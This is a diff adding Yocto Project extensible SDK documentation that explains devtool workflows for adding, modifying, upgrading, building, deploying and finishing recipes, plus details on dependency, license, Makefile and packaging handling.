+ scenarios by which you could use ``devtool add`` to generate a recipe
+ based on existing source code.
+
+ In a shared development environment, it is typical for other
+ developers to be responsible for various areas of source code. As a
+ developer, you are probably interested in using that source code as
+ part of your development within the Yocto Project. All you need is
+ access to the code, a recipe, and a controlled area in which to do
+ your work.
+
+ Within the diagram, three possible scenarios feed into the
+ ``devtool add`` workflow:
+
+ - *Left*: The left scenario in the figure represents a common
+ situation where the source code does not exist locally and needs
+ to be extracted. In this situation, the source code is extracted
+ to the default workspace - you do not want the files in some
+ specific location outside of the workspace. Thus, everything you
+ need will be located in the workspace:
+ ::
+
+ $ devtool add recipe fetchuri
+
+ With this command, ``devtool`` extracts the upstream
+ source files into a local Git repository within the ``sources``
+ folder. The command then creates a recipe named recipe and a
+ corresponding append file in the workspace. If you do not provide
+ recipe, the command makes an attempt to determine the recipe name.
+
+ - *Middle*: The middle scenario in the figure also represents a
+ situation where the source code does not exist locally. In this
+ case, the code is again upstream and needs to be extracted to some
+ local area - this time outside of the default workspace.
+
+ .. note::
+
+ If required,
+ devtool
+ always creates a Git repository locally during the extraction.
+
+ Furthermore, the first positional argument srctree in this case
+ identifies where the ``devtool add`` command will locate the
+ extracted code outside of the workspace. You need to specify an
+ empty directory:
+ ::
+
+ $ devtool add recipe srctree fetchuri
+
+ In summary,
+ the source code is pulled from fetchuri and extracted into the
+ location defined by srctree as a local Git repository.
+
+ Within workspace, ``devtool`` creates a recipe named recipe along
+ with an associated append file.
+
+ - *Right*: The right scenario in the figure represents a situation
+ where the srctree has been previously prepared outside of the
+ ``devtool`` workspace.
+
+ The following command provides a new recipe name and identifies
+ the existing source tree location:
+ ::
+
+ $ devtool add recipe srctree
+
+ The command examines the source code and creates a recipe named
+ recipe for the code and places the recipe into the workspace.
+
+ Because the extracted source code already exists, ``devtool`` does
+ not try to relocate the source code into the workspace - only the
+ new recipe is placed in the workspace.
+
+ Aside from a recipe folder, the command also creates an associated
+ append folder and places an initial ``*.bbappend`` file within.
+
+2. *Edit the Recipe*: You can use ``devtool edit-recipe`` to open up the
+ editor as defined by the ``$EDITOR`` environment variable and modify
+ the file:
+ ::
+
+ $ devtool edit-recipe recipe
+
+ From within the editor, you
+ can make modifications to the recipe that take affect when you build
+ it later.
+
+3. *Build the Recipe or Rebuild the Image*: The next step you take
+ depends on what you are going to do with the new code.
+
+ If you need to eventually move the build output to the target
+ hardware, use the following ``devtool`` command:
+ :;
+
+ $ devtool build recipe
+
+ On the other hand, if you want an image to contain the recipe's
+ packages from the workspace for immediate deployment onto a device
+ (e.g. for testing purposes), you can use the ``devtool build-image``
+ command:
+ ::
+
+ $ devtool build-image image
+
+4. *Deploy the Build Output*: When you use the ``devtool build`` command
+ to build out your recipe, you probably want to see if the resulting
+ build output works as expected on the target hardware.
+
+ .. note::
+
+ This step assumes you have a previously built image that is
+ already either running in QEMU or is running on actual hardware.
+ Also, it is assumed that for deployment of the image to the
+ target, SSH is installed in the image and, if the image is running
+ on real hardware, you have network access to and from your
+ development machine.
+
+ You can deploy your build output to that target hardware by using the
+ ``devtool deploy-target`` command: $ devtool deploy-target recipe
+ target The target is a live target machine running as an SSH server.
+
+ You can, of course, also deploy the image you build to actual
+ hardware by using the ``devtool build-image`` command. However,
+ ``devtool`` does not provide a specific command that allows you to
+ deploy the image to actual hardware.
+
+5. *Finish Your Work With the Recipe*: The ``devtool finish`` command
+ creates any patches corresponding to commits in the local Git
+ repository, moves the new recipe to a more permanent layer, and then
+ resets the recipe so that the recipe is built normally rather than
+ from the workspace.
+ ::
+
+ $ devtool finish recipe layer
+
+ .. note::
+
+ Any changes you want to turn into patches must be committed to the
+ Git repository in the source tree.
+
+ As mentioned, the ``devtool finish`` command moves the final recipe
+ to its permanent layer.
+
+ As a final process of the ``devtool finish`` command, the state of
+ the standard layers and the upstream source is restored so that you
+ can build the recipe from those areas rather than the workspace.
+
+ .. note::
+
+ You can use the
+ devtool reset
+ command to put things back should you decide you do not want to
+ proceed with your work. If you do use this command, realize that
+ the source tree is preserved.
+
+.. _sdk-devtool-use-devtool-modify-to-modify-the-source-of-an-existing-component:
+
+Use ``devtool modify`` to Modify the Source of an Existing Component
+--------------------------------------------------------------------
+
+The ``devtool modify`` command prepares the way to work on existing code
+that already has a local recipe in place that is used to build the
+software. The command is flexible enough to allow you to extract code
+from an upstream source, specify the existing recipe, and keep track of
+and gather any patch files from other developers that are associated
+with the code.
+
+Depending on your particular scenario, the arguments and options you use
+with ``devtool modify`` form different combinations. The following
+diagram shows common development flows for the ``devtool modify``
+command:
+
+.. image:: figures/sdk-devtool-modify-flow.png
+ :align: center
+
+1. *Preparing to Modify the Code*: The top part of the flow shows three
+ scenarios by which you could use ``devtool modify`` to prepare to
+ work on source files. Each scenario assumes the following:
+
+ - The recipe exists locally in a layer external to the ``devtool``
+ workspace.
+
+ - The source files exist either upstream in an un-extracted state or
+ locally in a previously extracted state.
+
+ The typical situation is where another developer has created a layer
+ for use with the Yocto Project and their recipe already resides in
+ that layer. Furthermore, their source code is readily available
+ either upstream or locally.
+
+ - *Left*: The left scenario in the figure represents a common
+ situation where the source code does not exist locally and it
+ needs to be extracted from an upstream source. In this situation,
+ the source is extracted into the default ``devtool`` workspace
+ location. The recipe, in this scenario, is in its own layer
+ outside the workspace (i.e. ``meta-``\ layername).
+
+ The following command identifies the recipe and, by default,
+ extracts the source files:
+ ::
+
+ $ devtool modify recipe
+
+ Once
+ ``devtool``\ locates the recipe, ``devtool`` uses the recipe's
+ :term:`SRC_URI` statements to
+ locate the source code and any local patch files from other
+ developers.
+
+ With this scenario, no srctree argument exists. Consequently, the
+ default behavior of the ``devtool modify`` command is to extract
+ the source files pointed to by the ``SRC_URI`` statements into a
+ local Git structure. Furthermore, the location for the extracted
+ source is the default area within the ``devtool`` workspace. The
+ result is that the command sets up both the source code and an
+ append file within the workspace while the recipe remains in its
+ original location.
+
+ Additionally, if you have any non-patch local files (i.e. files
+ referred to with ``file://`` entries in ``SRC_URI`` statement
+ excluding ``*.patch/`` or ``*.diff``), these files are copied to
+ an ``oe-local-files`` folder under the newly created source tree.
+ Copying the files here gives you a convenient area from which you
+ can modify the files. Any changes or additions you make to those
+ files are incorporated into the build the next time you build the
+ software just as are other changes you might have made to the
+ source.
+
+ - *Middle*: The middle scenario in the figure represents a situation
+ where the source code also does not exist locally. In this case,
+ the code is again upstream and needs to be extracted to some local
+ area as a Git repository. The recipe, in this scenario, is again
+ local and in its own layer outside the workspace.
+
+ The following command tells ``devtool`` the recipe with which to
+ work and, in this case, identifies a local area for the extracted
+ source files that exists outside of the default ``devtool``
+ workspace:
+ ::
+
+ $ devtool modify recipe srctree
+
+ .. note::
+
+ You cannot provide a URL for
+ srctree
+ using the
+ devtool
+ command.
+
+ As with all extractions, the command uses the recipe's ``SRC_URI``
+ statements to locate the source files and any associated patch
+ files. Non-patch files are copied to an ``oe-local-files`` folder
+ under the newly created source tree.
+
+ Once the files are located, the command by default extracts them
+ into srctree.
+
+ Within workspace, ``devtool`` creates an append file for the
+ recipe. The recipe remains in its original location but the source
+ files are extracted to the location you provide with srctree.
+
+ - *Right*: The right scenario in the figure represents a situation
+ where the source tree (srctree) already exists locally as a
+ previously extracted Git structure outside of the ``devtool``
+ workspace. In this example, the recipe also exists elsewhere
+ locally in its own layer.
+
+ The following command tells ``devtool`` the recipe with which to
+ work, uses the "-n" option to indicate source does not need to be
+ extracted, and uses srctree to point to the previously extracted
+ source files:
+ ::
+
+ $ devtool modify -n recipe srctree
+
+ If an ``oe-local-files`` subdirectory happens to exist and it
+ contains non-patch files, the files are used. However, if the
+ subdirectory does not exist and you run the ``devtool finish``
+ command, any non-patch files that might exist next to the recipe
+ are removed because it appears to ``devtool`` that you have
+ deleted those files.
+
+ Once the ``devtool modify`` command finishes, it creates only an
+ append file for the recipe in the ``devtool`` workspace. The
+ recipe and the source code remain in their original locations.
+
+2. *Edit the Source*: Once you have used the ``devtool modify`` command,
+ you are free to make changes to the source files. You can use any
+ editor you like to make and save your source code modifications.
+
+3. *Build the Recipe or Rebuild the Image*: The next step you take
+ depends on what you are going to do with the new code.
+
+ If you need to eventually move the build output to the target
+ hardware, use the following ``devtool`` command:
+ ::
+
+ $ devtool build recipe
+
+ On the other hand, if you want an image to contain the recipe's
+ packages from the workspace for immediate deployment onto a device
+ (e.g. for testing purposes), you can use the ``devtool build-image``
+ command: $ devtool build-image image
+
+4. *Deploy the Build Output*: When you use the ``devtool build`` command
+ to build out your recipe, you probably want to see if the resulting
+ build output works as expected on target hardware.
+
+ .. note::
+
+ This step assumes you have a previously built image that is
+ already either running in QEMU or running on actual hardware.
+ Also, it is assumed that for deployment of the image to the
+ target, SSH is installed in the image and if the image is running
+ on real hardware that you have network access to and from your
+ development machine.
+
+ You can deploy your build output to that target hardware by using the
+ ``devtool deploy-target`` command:
+ ::
+
+ $ devtool deploy-target recipe target
+
+ The target is a live target machine running as an SSH server.
+
+ You can, of course, use other methods to deploy the image you built
+ using the ``devtool build-image`` command to actual hardware.
+ ``devtool`` does not provide a specific command to deploy the image
+ to actual hardware.
+
+5. *Finish Your Work With the Recipe*: The ``devtool finish`` command
+ creates any patches corresponding to commits in the local Git
+ repository, updates the recipe to point to them (or creates a
+ ``.bbappend`` file to do so, depending on the specified destination
+ layer), and then resets the recipe so that the recipe is built
+ normally rather than from the workspace.
+ ::
+
+ $ devtool finish recipe layer
+
+ .. note::
+
+ Any changes you want to turn into patches must be staged and
+ committed within the local Git repository before you use the
+ devtool finish
+ command.
+
+ Because there is no need to move the recipe, ``devtool finish``
+ either updates the original recipe in the original layer or the
+ command creates a ``.bbappend`` file in a different layer as provided
+ by layer. Any work you did in the ``oe-local-files`` directory is
+ preserved in the original files next to the recipe during the
+ ``devtool finish`` command.
+
+ As a final process of the ``devtool finish`` command, the state of
+ the standard layers and the upstream source is restored so that you
+ can build the recipe from those areas rather than from the workspace.
+
+ .. note::
+
+ You can use the
+ devtool reset
+ command to put things back should you decide you do not want to
+ proceed with your work. If you do use this command, realize that
+ the source tree is preserved.
+
+.. _sdk-devtool-use-devtool-upgrade-to-create-a-version-of-the-recipe-that-supports-a-newer-version-of-the-software:
+
+Use ``devtool upgrade`` to Create a Version of the Recipe that Supports a Newer Version of the Software
+-------------------------------------------------------------------------------------------------------
+
+The ``devtool upgrade`` command upgrades an existing recipe to that of a
+more up-to-date version found upstream. Throughout the life of software,
+recipes continually undergo version upgrades by their upstream
+publishers. You can use the ``devtool upgrade`` workflow to make sure
+your recipes you are using for builds are up-to-date with their upstream
+counterparts.
+
+.. note::
+
+ Several methods exist by which you can upgrade recipes -
+ devtool upgrade
+ happens to be one. You can read about all the methods by which you
+ can upgrade recipes in the "
+ Upgrading Recipes
+ " section of the Yocto Project Development Tasks Manual.
+
+The ``devtool upgrade`` command is flexible enough to allow you to
+specify source code revision and versioning schemes, extract code into
+or out of the ``devtool``
+:ref:`devtool-the-workspace-layer-structure`,
+and work with any source file forms that the
+:ref:`fetchers <bitbake:bb-fetchers>` support.
+
+The following diagram shows the common development flow used with the
+``devtool upgrade`` command:
+
+.. image:: figures/sdk-devtool-upgrade-flow.png
+ :align: center
+
+1. *Initiate the Upgrade*: The top part of the flow shows the typical
+ scenario by which you use the ``devtool upgrade`` command. The
+ following conditions exist:
+
+ - The recipe exists in a local layer external to the ``devtool``
+ workspace.
+
+ - The source files for the new release exist in the same location
+ pointed to by :term:`SRC_URI`
+ in the recipe (e.g. a tarball with the new version number in the
+ name, or as a different revision in the upstream Git repository).
+
+ A common situation is where third-party software has undergone a
+ revision so that it has been upgraded. The recipe you have access to
+ is likely in your own layer. Thus, you need to upgrade the recipe to
+ use the newer version of the software:
+ ::
+
+ $ devtool upgrade -V version recipe
+
+ By default, the ``devtool upgrade`` command extracts source
+ code into the ``sources`` directory in the
+ :ref:`devtool-the-workspace-layer-structure`.
+ If you want the code extracted to any other location, you need to
+ provide the srctree positional argument with the command as follows:
+ $ devtool upgrade -V version recipe srctree
+
+ .. note::
+
+ In this example, the "-V" option specifies the new version. If you
+ don't use "-V", the command upgrades the recipe to the latest
+ version.
+
+ If the source files pointed to by the ``SRC_URI`` statement in the
+ recipe are in a Git repository, you must provide the "-S" option and
+ specify a revision for the software.
+
+ Once ``devtool`` locates the recipe, it uses the ``SRC_URI`` variable
+ to locate the source code and any local patch files from other
+ developers. The result is that the command sets up the source code,
+ the new version of the recipe, and an append file all within the
+ workspace.
+
+ Additionally, if you have any non-patch local files (i.e. files
+ referred to with ``file://`` entries in ``SRC_URI`` statement
+ excluding ``*.patch/`` or ``*.diff``), these files are copied to an
+ ``oe-local-files`` folder under the newly created source tree.
+ Copying the files here gives you a convenient area from which you can
+ modify the files. Any changes or additions you make to those files
+ are incorporated into the build the next time you build the software
+ just as are other changes you might have made to the source.
+
+2. *Resolve any Conflicts created by the Upgrade*: Conflicts could exist
+ due to the software being upgraded to a new version. Conflicts occur
+ if your recipe specifies some patch files in ``SRC_URI`` that
+ conflict with changes made in the new version of the software. For
+ such cases, you need to resolve the conflicts by editing the source
+ and following the normal ``git rebase`` conflict resolution process.
+
+ Before moving onto the next step, be sure to resolve any such
+ conflicts created through use of a newer or different version of the
+ software.
+
+3. *Build the Recipe or Rebuild the Image*: The next step you take
+ depends on what you are going to do with the new code.
+
+ If you need to eventually move the build output to the target
+ hardware, use the following ``devtool`` command:
+ ::
+
+ $ devtool build recipe
+
+ On the other hand, if you want an image to contain the recipe's
+ packages from the workspace for immediate deployment onto a device
+ (e.g. for testing purposes), you can use the ``devtool build-image``
+ command:
+ ::
+
+ $ devtool build-image image
+
+4. *Deploy the Build Output*: When you use the ``devtool build`` command
+ or ``bitbake`` to build your recipe, you probably want to see if the
+ resulting build output works as expected on target hardware.
+
+ .. note::
+
+ This step assumes you have a previously built image that is
+ already either running in QEMU or running on actual hardware.
+ Also, it is assumed that for deployment of the image to the
+ target, SSH is installed in the image and if the image is running
+ on real hardware that you have network access to and from your
+ development machine.
+
+ You can deploy your build output to that target hardware by using the
+ ``devtool deploy-target`` command: $ devtool deploy-target recipe
+ target The target is a live target machine running as an SSH server.
+
+ You can, of course, also deploy the image you build using the
+ ``devtool build-image`` command to actual hardware. However,
+ ``devtool`` does not provide a specific command that allows you to do
+ this.
+
+5. *Finish Your Work With the Recipe*: The ``devtool finish`` command
+ creates any patches corresponding to commits in the local Git
+ repository, moves the new recipe to a more permanent layer, and then
+ resets the recipe so that the recipe is built normally rather than
+ from the workspace.
+
+ Any work you did in the ``oe-local-files`` directory is preserved in
+ the original files next to the recipe during the ``devtool finish``
+ command.
+
+ If you specify a destination layer that is the same as the original
+ source, then the old version of the recipe and associated files are
+ removed prior to adding the new version.
+ ::
+
+ $ devtool finish recipe layer
+
+ .. note::
+
+ Any changes you want to turn into patches must be committed to the
+ Git repository in the source tree.
+
+ As a final process of the ``devtool finish`` command, the state of
+ the standard layers and the upstream source is restored so that you
+ can build the recipe from those areas rather than the workspace.
+
+ .. note::
+
+ You can use the
+ devtool reset
+ command to put things back should you decide you do not want to
+ proceed with your work. If you do use this command, realize that
+ the source tree is preserved.
+
+.. _sdk-a-closer-look-at-devtool-add:
+
+A Closer Look at ``devtool add``
+================================
+
+The ``devtool add`` command automatically creates a recipe based on the
+source tree you provide with the command. Currently, the command has
+support for the following:
+
+- Autotools (``autoconf`` and ``automake``)
+
+- CMake
+
+- Scons
+
+- ``qmake``
+
+- Plain ``Makefile``
+
+- Out-of-tree kernel module
+
+- Binary package (i.e. "-b" option)
+
+- Node.js module
+
+- Python modules that use ``setuptools`` or ``distutils``
+
+Apart from binary packages, the determination of how a source tree
+should be treated is automatic based on the files present within that
+source tree. For example, if a ``CMakeLists.txt`` file is found, then
+the source tree is assumed to be using CMake and is treated accordingly.
+
+.. note::
+
+ In most cases, you need to edit the automatically generated recipe in
+ order to make it build properly. Typically, you would go through
+ several edit and build cycles until the recipe successfully builds.
+ Once the recipe builds, you could use possible further iterations to
+ test the recipe on the target device.
+
+The remainder of this section covers specifics regarding how parts of
+the recipe are generated.
+
+.. _sdk-name-and-version:
+
+Name and Version
+----------------
+
+If you do not specify a name and version on the command line,
+``devtool add`` uses various metadata within the source tree in an
+attempt to determine the name and version of the software being built.
+Based on what the tool determines, ``devtool`` sets the name of the
+created recipe file accordingly.
+
+If ``devtool`` cannot determine the name and version, the command prints
+an error. For such cases, you must re-run the command and provide the
+name and version, just the name, or just the version as part of the
+command line.
+
+Sometimes the name or version determined from the source tree might be
+incorrect. For such a case, you must reset the recipe:
+::
+
+ $ devtool reset -n recipename
+
+After running the ``devtool reset`` command, you need to
+run ``devtool add`` again and provide the name or the version.
+
+.. _sdk-dependency-detection-and-mapping:
+
+Dependency Detection and Mapping
+--------------------------------
+
+The ``devtool add`` command attempts to detect build-time dependencies
+and map them to other recipes in the system. During this mapping, the
+command fills in the names of those recipes as part of the
+:term:`DEPENDS` variable within the
+recipe. If a dependency cannot be mapped, ``devtool`` places a comment
+in the recipe indicating such. The inability to map a dependency can
+result from naming not being recognized or because the dependency simply
+is not available. For cases where the dependency is not available, you
+must use the ``devtool add`` command to add an additional recipe that
+satisfies the dependency. Once you add that recipe, you need to update
+the ``DEPENDS`` variable in the original recipe to include the new
+recipe.
+
+If you need to add runtime dependencies, you can do so by adding the
+following to your recipe:
+::
+
+ RDEPENDS_${PN} += "dependency1 dependency2 ..."
+
+.. note::
+
+ The
+ devtool add
+ command often cannot distinguish between mandatory and optional
+ dependencies. Consequently, some of the detected dependencies might
+ in fact be optional. When in doubt, consult the documentation or the
+ configure script for the software the recipe is building for further
+ details. In some cases, you might find you can substitute the
+ dependency with an option that disables the associated functionality
+ passed to the configure script.
+
+.. _sdk-license-detection:
+
+License Detection
+-----------------
+
+The ``devtool add`` command attempts to determine if the software you
+are adding is able to be distributed under a common, open-source
+license. If so, the command sets the
+:term:`LICENSE` value accordingly.
+You should double-check the value added by the command against the
+documentation or source files for the software you are building and, if
+necessary, update that ``LICENSE`` value.
+
+The ``devtool add`` command also sets the
+:term:`LIC_FILES_CHKSUM`
+value to point to all files that appear to be license-related. Realize
+that license statements often appear in comments at the top of source
+files or within the documentation. In such cases, the command does not
+recognize those license statements. Consequently, you might need to
+amend the ``LIC_FILES_CHKSUM`` variable to point to one or more of those
+comments if present. Setting ``LIC_FILES_CHKSUM`` is particularly
+important for third-party software. The mechanism attempts to ensure
+correct licensing should you upgrade the recipe to a newer upstream
+version in future. Any change in licensing is detected and you receive
+an error prompting you to check the license text again.
+
+If the ``devtool add`` command cannot determine licensing information,
+``devtool`` sets the ``LICENSE`` value to "CLOSED" and leaves the
+``LIC_FILES_CHKSUM`` value unset. This behavior allows you to continue
+with development even though the settings are unlikely to be correct in
+all cases. You should check the documentation or source files for the
+software you are building to determine the actual license.
+
+.. _sdk-adding-makefile-only-software:
+
+Adding Makefile-Only Software
+-----------------------------
+
+The use of Make by itself is very common in both proprietary and
+open-source software. Unfortunately, Makefiles are often not written
+with cross-compilation in mind. Thus, ``devtool add`` often cannot do
+very much to ensure that these Makefiles build correctly. It is very
+common, for example, to explicitly call ``gcc`` instead of using the
+:term:`CC` variable. Usually, in a
+cross-compilation environment, ``gcc`` is the compiler for the build
+host and the cross-compiler is named something similar to
+``arm-poky-linux-gnueabi-gcc`` and might require arguments (e.g. to
+point to the associated sysroot for the target machine).
+
+When writing a recipe for Makefile-only software, keep the following in
+mind:
+
+- You probably need to patch the Makefile to use variables instead of
+ hardcoding tools within the toolchain such as ``gcc`` and ``g++``.
+
+- The environment in which Make runs is set up with various standard
+ variables for compilation (e.g. ``CC``, ``CXX``, and so forth) in a
+ similar manner to the environment set up by the SDK's environment
+ setup script. One easy way to see these variables is to run the
+ ``devtool build`` command on the recipe and then look in
+ ``oe-logs/run.do_compile``. Towards the top of this file, a list of
+ environment variables exists that are being set. You can take
+ advantage of these variables within the Makefile.
+
+- If the Makefile sets a default for a variable using "=", that default
+ overrides the value set in the environment, which is usually not
+ desirable. For this case, you can either patch the Makefile so it
+ sets the default using the "?=" operator, or you can alternatively
+ force the value on the ``make`` command line. To force the value on
+ the command line, add the variable setting to
+ :term:`EXTRA_OEMAKE` or
+ :term:`PACKAGECONFIG_CONFARGS`
+ within the recipe. Here is an example using ``EXTRA_OEMAKE``:
+ ::
+
+ EXTRA_OEMAKE += "'CC=${CC}' 'CXX=${CXX}'"
+
+ In the above example,
+ single quotes are used around the variable settings as the values are
+ likely to contain spaces because required default options are passed
+ to the compiler.
+
+- Hardcoding paths inside Makefiles is often problematic in a
+ cross-compilation environment. This is particularly true because
+ those hardcoded paths often point to locations on the build host and
+ thus will either be read-only or will introduce contamination into
+ the cross-compilation because they are specific to the build host
+ rather than the target. Patching the Makefile to use prefix variables
+ or other path variables is usually the way to handle this situation.
+
+- Sometimes a Makefile runs target-specific commands such as
+ ``ldconfig``. For such cases, you might be able to apply patches that
+ remove these commands from the Makefile.
+
+.. _sdk-adding-native-tools:
+
+Adding Native Tools
+-------------------
+
+Often, you need to build additional tools that run on the :term:`Build
+Host` as opposed to
+the target. You should indicate this requirement by using one of the
+following methods when you run ``devtool add``:
+
+- Specify the name of the recipe such that it ends with "-native".
+ Specifying the name like this produces a recipe that only builds for
+ the build host.
+
+- Specify the "DASHDASHalso-native" option with the ``devtool add``
+ command. Specifying this option creates a recipe file that still
+ builds for the target but also creates a variant with a "-native"
+ suffix that builds for the build host.
+
+.. note::
+
+ If you need to add a tool that is shipped as part of a source tree
+ that builds code for the target, you can typically accomplish this by
+ building the native and target parts separately rather than within
+ the same compilation process. Realize though that with the
+ "DASHDASHalso-native" option, you can add the tool using just one
+ recipe file.
+
+.. _sdk-adding-node-js-modules:
+
+Adding Node.js Modules
+----------------------
+
+You can use the ``devtool add`` command two different ways to add
+Node.js modules: 1) Through ``npm`` and, 2) from a repository or local
+source.
+
+Use the following form to add Node.js modules through ``npm``:
+::
+
+ $ devtool add "npm://registry.npmjs.org;name=forever;version=0.15.1"
+
+The name and
+version parameters are mandatory. Lockdown and shrinkwrap files are
+generated and pointed to by the recipe in order to freeze the version
+that is fetched for the dependencies according to the first time. This
+also saves checksums that are verified on future fetches. Together,
+these behaviors ensure the reproducibility and integrity of the build.
+
+.. note::
+
+ - You must use quotes around the URL. The ``devtool add`` does not
+ require the quotes, but the shell considers ";" as a splitter
+ between multiple commands. Thus, without the quotes,
+ ``devtool add`` does not receive the other parts, which results in
+ several "command not found" errors.
+
+ - In order to support adding Node.js modules, a ``nodejs`` recipe
+ must be part of your SDK.
+
+As mentioned earlier, you can also add Node.js modules directly from a
+repository or local source tree. To add modules this way, use
+``devtool add`` in the following form:
+::
+
+ $ devtool add https://github.com/diversario/node-ssdp
+
+In this example, ``devtool``
+fetches the specified Git repository, detects the code as Node.js code,
+fetches dependencies using ``npm``, and sets
+:term:`SRC_URI` accordingly.
+
+.. _sdk-working-with-recipes:
+
+Working With Recipes
+====================
+
+When building a recipe using the ``devtool build`` command, the typical
+build progresses as follows:
+
+1. Fetch the source
+
+2. Unpack the source
+
+3. Configure the source
+
+4. Compile the source
+
+5. Install the build output
+
+6. Package the installed output
+
+For recipes in the workspace, fetching and unpacking is disabled as the
+source tree has already been prepared and is persistent. Each of these
+build steps is defined as a function (task), usually with a "do\_" prefix
+(e.g. :ref:`ref-tasks-fetch`,
+:ref:`ref-tasks-unpack`, and so
+forth). These functions are typically shell scripts but can instead be
+written in Python.
+
+If you look at the contents of a recipe, you will see that the recipe
+does not include complete instructions for building the software.
+Instead, common functionality is encapsulated in classes inherited with
+the ``inherit`` directive. This technique leaves the recipe to describe
+just the things that are specific to the software being built. A
+:ref:`base <ref-classes-base>` class exists that
+is implicitly inherited by all recipes and provides the functionality
+that most recipes typically need.
+
+The remainder of this section presents information useful when working
+with recipes.
+
+.. _sdk-finding-logs-and-work-files:
+
+Finding Logs and Work Files
+---------------------------
+
+After the first run of the ``devtool build`` command, recipes that were
+previously created using the ``devtool add`` command or whose sources
+were modified using the ``devtool modify`` command contain symbolic
+links created within the source tree:
+
+- ``oe-logs``: This link points to the directory in which log files and
+ run scripts for each build step are created.
+
+- ``oe-workdir``: This link points to the temporary work area for the
+ recipe. The following locations under ``oe-workdir`` are particularly
+ useful:
+
+ - ``image/``: Contains all of the files installed during the
+ :ref:`ref-tasks-install` stage.
+ Within a recipe, this directory is referred to by the expression
+ ``${``\ :term:`D`\ ``}``.
+
+ - ``sysroot-destdir/``: Contains a subset of files installed within
+ ``do_install`` that have been put into the shared sysroot. For
+ more information, see the "`Sharing Files Between
+ Recipes <#sdk-sharing-files-between-recipes>`__" section.
+
+ - ``packages-split/``: Contains subdirectories for each package
+ produced by the recipe. For more information, see the
+ "`Packaging <#sdk-packaging>`__" section.
+
+You can use these links to get more information on what is happening at
+each build step.
+
+.. _sdk-setting-configure-arguments:
+
+Setting Configure Arguments
+---------------------------
+
+If the software your recipe is building uses GNU autoconf, then a fixed
+set of arguments is passed to it to enable cross-compilation plus any
+extras specified by
+:term:`EXTRA_OECONF` or
+:term:`PACKAGECONFIG_CONFARGS`
+set within the recipe. If you wish to pass additional options, add them
+to ``EXTRA_OECONF`` or ``PACKAGECONFIG_CONFARGS``. Other supported build
+tools have similar variables (e.g.
+:term:`EXTRA_OECMAKE` for
+CMake, :term:`EXTRA_OESCONS`
+for Scons, and so forth). If you need to pass anything on the ``make``
+command line, you can use ``EXTRA_OEMAKE`` or the
+:term:`PACKAGECONFIG_CONFARGS`
+variables to do so.
+
+You can use the ``devtool configure-help`` command to help you set the
+arguments listed in the previous paragraph. The command determines the
+exact options being passed, and shows them to you along with any custom
+arguments specified through ``EXTRA_OECONF`` or
+``PACKAGECONFIG_CONFARGS``. If applicable, the command also shows you
+the output of the configure script's "DASHDASHhelp" option as a
+reference.
+
+.. _sdk-sharing-files-between-recipes:
+
+Sharing Files Between Recipes
+-----------------------------
+
+Recipes often need to use files provided by other recipes on the
+:term:`Build Host`. For example,
+an application linking to a common library needs access to the library
+itself and its associated headers. The way this access is accomplished
+within the extensible SDK is through the sysroot. One sysroot exists per
+"machine" for which the SDK is being built. In practical terms, this
+means a sysroot exists for the target machine, and a sysroot exists for
+the build host.
+
+Recipes should never write files directly into the sysroot. Instead,
+files should be installed into standard locations during the
+:ref:`ref-tasks-install` task within
+the ``${``\ :term:`D`\ ``}`` directory. A
+subset of these files automatically goes into the sysroot. The reason
+for this limitation is that almost all files that go into the sysroot
+are cataloged in manifests in order to ensure they can be removed later
+when a recipe is modified or removed. Thus, the sysroot is able to
+remain free from stale files.
+
+.. _sdk-packaging:
+
+Packaging
+---------
+
+Packaging is not always particularly relevant within the extensible SDK.
+However, if you examine how build output gets into the final image on
+the target device, it is important to understand packaging because the
+contents of the image are expressed in terms of packages and not
+recipes.
+
+During the :ref:`ref-tasks-package`
+task, files installed during the
+:ref:`ref-tasks-install` task are
+split into one main package, which is almost always named the same as
+the recipe, and into several other packages. This separation exists
+because not all of those installed files are useful in every image. For
+example, you probably do not need any of the documentation installed in
+a production image. Consequently, for each recipe the documentation
+files are separated into a ``-doc`` package. Recipes that package
+software containing optional modules or plugins might undergo additional
+package splitting as well.
+
+After building a recipe, you can see where files have gone by looking in
+the ``oe-workdir/packages-split`` directory, which contains a
+subdirectory for each package. Apart from some advanced cases, the
+:term:`PACKAGES` and
+:term:`FILES` variables controls
+splitting. The ``PACKAGES`` variable lists all of the packages to be
+produced, while the ``FILES`` variable specifies which files to include
+in each package by using an override to specify the package. For
+example, ``FILES_${PN}`` specifies the files to go into the main package
+(i.e. the main package has the same name as the recipe and
+``${``\ :term:`PN`\ ``}`` evaluates to the
+recipe name). The order of the ``PACKAGES`` value is significant. For
+each installed file, the first package whose ``FILES`` value matches the
+file is the package into which the file goes. Defaults exist for both
+the ``PACKAGES`` and ``FILES`` variables. Consequently, you might find
+you do not even need to set these variables in your recipe unless the
+software the recipe is building installs files into non-standard
+locations.
+
+.. _sdk-restoring-the-target-device-to-its-original-state:
+
+Restoring the Target Device to its Original State
+=================================================
+
+If you use the ``devtool deploy-target`` command to write a recipe's
+build output to the target, and you are working on an existing component
+of the system, then you might find yourself in a situation where you
+need to restore the original files that existed prior to running the
+``devtool deploy-target`` command. Because the ``devtool deploy-target``
+command backs up any files it overwrites, you can use the
+``devtool undeploy-target`` command to restore those files and remove
+any other files the recipe deployed. Consider the following example:
+::
+
+ $ devtool undeploy-target lighttpd root@192.168.7.2
+
+If you have deployed
+multiple applications, you can remove them all using the "-a" option
+thus restoring the target device to its original state:
+::
+
+ $ devtool undeploy-target -a root@192.168.7.2
+
+Information about files deployed to
+the target as well as any backed up files are stored on the target
+itself. This storage, of course, requires some additional space on the
+target machine.
+
+.. note::
+
+ The
+ devtool deploy-target
+ and
+ devtool undeploy-target
+ commands do not currently interact with any package management system
+ on the target device (e.g. RPM or OPKG). Consequently, you should not
+ intermingle
+ devtool deploy-target
+ and package manager operations on the target device. Doing so could
+ result in a conflicting set of files.
+
+.. _sdk-installing-additional-items-into-the-extensible-sdk:
+
+Installing Additional Items Into the Extensible SDK
+===================================================
+
+Out of the box the extensible SDK typically only comes with a small
+number of tools and libraries. A minimal SDK starts mostly empty and is
+populated on-demand. Sometimes you must explicitly install extra items
+into the SDK. If you need these extra items, you can first search for
+the items using the ``devtool search`` command. For example, suppose you
+need to link to libGL but you are not sure which recipe provides libGL.
+You can use the following command to find out:
+::
+
+ $ devtool search libGL mesa
+
+A free implementation of the OpenGL API Once you know the recipe
+(i.e. ``mesa`` in this example), you can install it:
+::
+
+ $ devtool sdk-install mesa
+
+By default, the ``devtool sdk-install`` command assumes
+the item is available in pre-built form from your SDK provider. If the
+item is not available and it is acceptable to build the item from
+source, you can add the "-s" option as follows:
+::
+
+ $ devtool sdk-install -s mesa
+
